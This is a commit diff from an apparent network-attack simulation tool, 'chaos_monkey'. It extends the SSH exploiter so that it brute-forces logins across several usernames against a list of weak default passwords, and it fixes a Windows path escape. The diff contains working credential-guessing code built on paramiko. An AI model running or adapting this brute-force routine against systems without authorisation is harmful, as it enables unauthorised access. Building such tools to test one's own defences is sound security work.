Issue #18, added ability to attack multiple users in SSH brute force.

Also fixed small bug in windows kill path parsing.
2016-08-08 22:25:33 +03:00 · 2016-08-08 22:25:33 +03:00 · d75ce529ab
parent 2ed7cc359e
commit d75ce529ab
3 changed files with 22 additions and 16 deletions
--- a/chaos_monkey/config.py
+++ b/chaos_monkey/config.py
@ -194,7 +194,7 @@ class Configuration(object):
    psexec_passwords = ["Password1!", "1234", "password", "12345678"]

    # ssh exploiter
-    ssh_user = "root"
+    ssh_users = ["root"]
    ssh_passwords = ["Password1!", "1234", "password", "12345678"]

    # rdp exploiter
--- a/chaos_monkey/example.conf
+++ b/chaos_monkey/example.conf
@ -39,7 +39,7 @@


    "kill_file_path_linux": "/var/run/monkey.not",
-    "kill_file_path_windows": "%windir%\monkey.not",
+    "kill_file_path_windows": "%windir%\\monkey.not",
    "dropper_try_move_first": false,
    "exploiter_classes": [
        "SSHExploiter",
@ -69,7 +69,9 @@
    "serialize_config": false,
    "singleton_mutex_name": "{2384ec59-0df8-4ab9-918c-843740924a28}",
    "skip_exploit_if_file_exist": true,
-    "ssh_user": "root",
+    "ssh_user": [
+        "root"
+    ],
    "local_network_scan": true,
    "tcp_scan_get_banner": true,
    "tcp_scan_interval": 200,
--- a/chaos_monkey/exploit/sshexec.py
+++ b/chaos_monkey/exploit/sshexec.py
@ -1,12 +1,13 @@
 import paramiko
-import monkeyfs
 import logging
+import time
+from itertools import product
+import monkeyfs
 from tools import build_monkey_commandline
 from exploit import HostExploiter
 from model import MONKEY_ARG
 from exploit.tools import get_target_monkey
 from network.tools import check_port_tcp
-import time

 __author__ = 'hoffer'

@ -43,31 +44,34 @@ class SSHExploiter(HostExploiter):
            return False                

        passwords = list(self._config.ssh_passwords[:])
-        known_password = host.get_credentials(self._config.ssh_user)
-        if known_password is not None:
-            if known_password in passwords:
-                passwords.remove(known_password)
-            passwords.insert(0, known_password)
+        users = list(self._config.ssh_users)
+        known_passwords = [host.get_credentials(x) for x in users]
+        if len(known_passwords) > 0:
+            for known_pass in known_passwords:
+                if known_pass in passwords:
+                    passwords.remove(known_pass)
+                    passwords.insert(0, known_pass) #try first
+        user_pass = product(users,passwords)

        exploited = False
-        for password in passwords:
+        for user, curpass in user_pass:
            try:
                ssh.connect(host.ip_addr,
-                            username=self._config.ssh_user,
-                            password=password,
+                            username=user,
+                            password=curpass,
                            port=port,
                            timeout=None)

                LOG.debug("Successfully logged in %r using SSH (%s : %s)",
-                          host, self._config.ssh_user, password)
-                host.learn_credentials(self._config.ssh_user, password)
+                          host, user, curpass)
+                host.learn_credentials(user, curpass)
                exploited = True
                break

            except Exception, exc:
                LOG.debug("Error logging into victim %r with user"
                          " %s and password '%s': (%s)", host,
-                          self._config.ssh_user, password, exc)
+                          user, curpass, exc)
                continue

        if not exploited: